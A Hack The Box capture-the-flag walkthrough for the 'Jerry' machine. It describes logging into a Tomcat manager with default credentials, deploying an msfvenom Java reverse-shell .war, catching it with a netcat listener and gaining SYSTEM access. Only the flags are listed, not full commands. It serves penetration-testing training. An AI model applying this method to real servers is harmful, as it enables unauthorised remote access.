Hack The Box – Jerry Walkthrough
Introduction
This was a very easy box, as it involved logging into the Tomcat Web Application Manager using default credentials, deploying a new application using a malicious .war Java reverse shell and gaining a reverse shell by navigating to it.
Enumeration
The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:
- -sC to run default scripts
- -sV to enumerate applications versions
- -Pn to skip the host discovery phase, as some hosts will not respond to ping requests
Enumerating Port HTTP
When browsing to the web server, it shows the Tomcat default home page:
When navigating to the /manager page, which is used to manage Tomcat applications, a login prompt appears:
Searching on Google for default Tomcat credentials
After trying a few of the default credentials, tomcat/s3cret allow to login:
Tomcat .war file upload exploitation
Tomcat allows to deploy war files as applications, which are archives containing Java web pages; This can be used to upload a reverse shell and execute it to gain remote access.
Generating some shellcode and saving it as a .war file using MSFvenom with the following flags:
- -p to specify the payload type, in this case the Java reverse shell
- LHOST to specify the local host IP address to connect to
- LPORT to specify the local port to connect to
Attaching the file to the “Deploy” section of the manager page:
After deploying the .war file, the application is available in the list:
The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
- -p to specify the port to listen on
Navigating to the newly deployed application in order to trigger the shell:
This has granted a reverse shell as expected:
As the current user is already SYSTEM, so no privilege escalation is required
Conclusion
This is probably one of the easiest boxes on Hack the Box, although it can be really useful if you haven’t exploited Tomcat .war applications before, as it is a quite common attack that every penetration tester should know.